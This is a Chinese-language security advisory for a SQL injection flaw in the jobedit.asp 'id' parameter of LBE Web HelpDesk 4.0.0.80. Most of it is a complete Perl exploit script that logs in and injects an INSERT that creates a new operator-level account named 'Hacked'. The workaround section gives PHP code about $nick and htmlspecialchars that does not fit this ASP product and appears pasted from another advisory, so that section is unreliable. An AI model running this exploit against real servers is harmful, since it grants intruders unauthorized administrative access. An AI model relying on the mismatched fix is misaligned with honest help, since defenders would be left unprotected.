Leigh Business Enterprises Web HelpDesk SQL注入漏洞
2005-08-17
系统编号:
WAVDB-00494
BUGTRAQ: 10773
影响版本:
Leigh Business Enterprises Web HelpDesk 4.0.0.80
程序介绍:
LBE Web Helpdesk是一款可通过WEB浏览器进行操作的Helpdesk系统。
漏洞分析:
LBE Web Helpdesk不正确过滤用户提交的数据,远程攻击者可以利用这个漏洞进行SQL注入攻击,可能获得敏感数据或修改数据库。
问题存在于jobedit.asp脚本对用户提交给'id'参数缺少过滤,提交包含恶意SQL命令的数据作为'id'参数,可修改'users'表,增加操作员相等权限的新用户。
漏洞利用:
#!/usr/bin/perl
use IO::Socket;
use strict;
my $host = $ARGV[0];
my $Path = $ARGV[1];
my $Email = $ARGV[2];
my $Password = $ARGV[3];
if (($#ARGV+1) < 4)
{
print lbehelpdesk.pl host path email password\n ;
exit(0);
}
my $remote = IO::Socket::INET->new ( Proto => tcp , PeerAddr => $host, PeerPort => 80 );
unless ($remote) { die cannot connect to http daemon on $host }
print Getting default cookie\n ;
my $http = GET /$Path/oplogin.asp HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,ima
ge/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
;
print HTTP: [$http]\n ;
print $remote $http;
sleep(1);
my $Cookie = ;
while (<$remote>)
{
if (/Set-Cookie: ([^;]+;)/)
{
$Cookie .= $1. ;
}
# print $_;
}
print \n ;
close($remote);
$remote = IO::Socket::INET->new ( Proto => tcp , PeerAddr => $host, PeerPort => 80 );
unless ($remote) { die cannot connect to http daemon on $host }
print Logging in\n ;
$remote->autoflush(1);
my $http = POST /$Path/gstlogin.asp HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://192.168.1.243/lbehelpdesk/gstlogin.asp
Cookie: $Cookie
Content-Type: application/x-www-form-urlencoded
Content-Length: ;
my $content = txtemail=$Email&txtpwd=$Password ;
$http .= length($content).
$content ;
print HTTP: [$http]\n ;
print $remote $http;
sleep(1);
my $success = 0;
while (<$remote>)
{
if (/Location: eval.asp/)
{
$success = 1;
print Login successfull\n ;
}
# print $_;
}
print \n ;
close $remote;
if (!$success)
{
print Login failed\n ;
exit(0);
}
$http = GET /$Path/jobedit.asp?id=0%20;%20INSERT%20INTO%20users%20(%20user_name, .
%20password,%20editactiontime,%20orgstructure,%20createviewtemplate, .
%20removelogins,%20editlinkedfiles,%20newencrypt,%20showalljobs, .
%20publishmacros,%20override_contract%20)%20VALUES%20('Hacked', .
%20'60716363677F6274',%201,%201,%201,%201,%201,%20'Y',%201, .
%201,%201) HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://192.168.1.243/lbehelpdesk/gstlogin.asp
Cookie: $Cookie
;
$remote = IO::Socket::INET->new ( Proto => tcp , PeerAddr => $host, PeerPort => 80 );
unless ($remote) { die cannot connect to http daemon on $host }
print HTTP: [$http]\n ;
print $remote $http;
sleep(1);
while (<$remote>)
{
if (/Unable to find Job id = 0 ; INSERT INTO users/g)
{
print Successfully added record\nYou can now log on as Hacked/password (Username/Password)\n ;
}
# print $_;
}
close($remote);
解决方案:
临时解决方法:
如果您不能立刻安装补丁或者升级,建议您采取以下措施以降低威胁:
* 在$nick = htmlspecialchars($nick);前插入if ($cadena_final) { unset($cadena_final); }代码。
厂商补丁:
Leigh Business Enterprises
--------------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Leigh Business Enterprises Web HelpDesk 4.0 .0.80:
Leigh Business Enterprises Upgrade weblatest.zip
http://www.lbehelpdesk.com/patch/web/weblatest.zip
信息来源:
<*来源:Noam Rathaus (noamr@beyondsecurity.com)
链接:http://www.securiteam.com/windowsntfocus/5QP0M0ADGI.html
*>